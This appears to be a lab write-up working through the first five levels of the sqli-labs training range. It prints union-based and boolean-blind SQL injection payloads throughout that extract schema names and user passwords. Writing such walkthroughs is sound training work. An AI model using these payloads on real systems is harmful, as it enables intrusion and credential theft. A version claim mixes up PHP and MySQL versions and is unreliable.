Sqli labs range 1-5
2022-06-26 10:56:00 【Qihai】
Workflow
- Find the injection point and determine the injection type
- Determine the number of columns
- Find the display positions (which columns are echoed to the page)
- Dump the database name
- Dump the table names
- Dump the column names
- Dump the data
Configuration notes
When using the sqli-labs range locally, two things need attention:
Database configuration file: db-creds.inc (under sql-connections/), where the MySQL username and password are set

PHP version: the range is old and uses the mysql_* extension that PHP 7 removed, so pick a PHP 5 release such as 5.3.29

Less-1  Single-quote string injection
1. Find the injection point and injection type
A bare single quote breaks the query; ?id=-1' --+ closes the string and comments out the rest, so the page comes back without an error (in the URL, --+ decodes to "-- ", and MySQL needs that space after --)
2. Determine the number of columns
?id=1' order by 4--+ (errors; order by 3 succeeds, so there are three columns)
3. Find the display positions
?id=-1' union select 1,2,3 --+ (id=-1 matches no row, so the union row is what gets rendered; the markers that appear on the page are the display positions)
4. Dump the database name
-1' union select 1,2,database()--+
5. Dump the table names
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
6. Dump the column names
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+
(this lists the columns of every table in the current schema; add and table_name='users' to restrict it to one table)
7. Dump the data
-1' union select 1,group_concat(username),3 from security.users --+
-1' union select 1,group_concat(username),group_concat(password) from users --+
Determining the type
A bare single quote produces a SQL syntax error; with the comment appended the page returns normally, so the quoted string has been closed and there is an injection point

1' and 1=1 returns normally, 1' and 1=2 returns nothing
Determining the number of columns

order by 3 succeeds, order by 4 errors: three columns
Finding the display positions

Dumping the database name
Database name: security
Dumping the table names
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
Tables: emails,referers,uagents,users
Pick a table: users
Dumping the column names
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

Dumping the data
?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+

Less-2  Numeric injection
Determining the type

?id=1 and 1=1 returns normally, ?id=1 and 1=2 returns nothing, so the parameter is used as a bare number and there is no quote to close
Determining the number of columns

order by gives the number of columns: 3
Finding the display positions

Dumping the database name

Dumping the table names
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Dumping the column names
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

Dumping the data
?id=-1 union select 1,group_concat(username),group_concat(password) from security.users --+

Less-3  Single quote + parenthesis injection
Determining the type
Probing shows that ') closes the query
ps:
During testing I found that a double quote also seemed to close the string, but the commands that followed failed to execute, presumably because the closing had been judged wrong.
Checking the corresponding SQL statement makes it clear that this level closes with ').
Determining the number of columns

There are 3 columns
Finding the display positions

Dumping the database name

Dumping the table names
Less-3/?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

Dumping the column names
Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

Dumping the data

Less-4  Double quote + parenthesis injection
Determining the type
") closes the query
Looking at the source: the input id is wrapped in double quotes, and the query adds parentheses around it
Determining the number of columns


Finding the display positions

Dumping the database name

Dumping the table names
Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

Dumping the column names
Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

Dumping the data
Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from security.users --+

Less-5
Determining the type

Closed with a single quote
Determining the number of columns


Finding the display positions
There is no display position: the page only reports whether the query returned a row, so the data has to come out through error-based or blind injection
Reference for this level: https://blog.csdn.net/Fly_hps/article/details/80247032
Blind injection, Boolean-based
Test the database version:
/Less-5/?id=1' and left(version(),1)=5 --+
Checking version() shows the database version is 5.3; this condition asks whether the first character of the version string is 5, and the page returns normally, so it is.

Determine the length of the database name
Test the length:
Less-5/?id=1' and length(database())=8--+

Dumping the database name with left(a,b)
Test the first character of the name:
Less-5/?id=1' and left(database(),1)>'a'--+
Less-5/?id=1' and left(database(),1)='s'--+
Test the first two characters:
Less-5/?id=1' and left(database(),2)='se'--+
...

After narrowing it down with greater-than and less-than comparisons, equality confirms that the first character of the database name is s.
ps:
When the value is unknown, a binary search (dichotomy) over the character range is far more efficient than guessing letters one by one.
The remaining positions work the same way: increase b in left(a,b) by one each time and compare the longer prefix (b is the number of leading characters being tested).
The database name recovered this way is security.
Dumping the table names with substr() and ascii()
Get the first character of the first table in the security database:
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 --+
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 --+
Changing the second argument ("start") of substr(str,start,length) moves on to the second character of the first table name.
To guess the second table, change start in limit start,length: limit 1,1 selects the second table name, which is then tested the same way.
/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>100--+
First table:
After testing, the first character of the first table name is e (ASCII 101).
Second table:
After testing, the database is confirmed to be security and it contains a users table.
Dumping the column names with regexp
Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+
Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+
The first query confirms that the users table has a column starting with us followed by a letter; the second confirms that the column username exists.
Dumping the data with ord() and mid()
Get the ASCII code of the first character of username in the first row of users:
/Less-5/?id=1' and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+
cast(username as char) converts username to a char type; note that this is the cast function (syntax: cast(column as type)).
ifnull(expr1,expr2) returns expr1 if it is not NULL and expr2 otherwise, so a NULL username is replaced by 0x20 (a space, written as its hexadecimal ASCII code) instead of turning the whole expression into NULL.
mid(str,start,length) extracts length characters from str starting at position start; it is a synonym of substr().
ord() returns the same value as ascii() for single-byte characters: the character's ASCII code. 68 is 'D', so the first username starts with D.

Error-based injection
Blind injection is a bit painful; I'll write up error-based injection when I have time.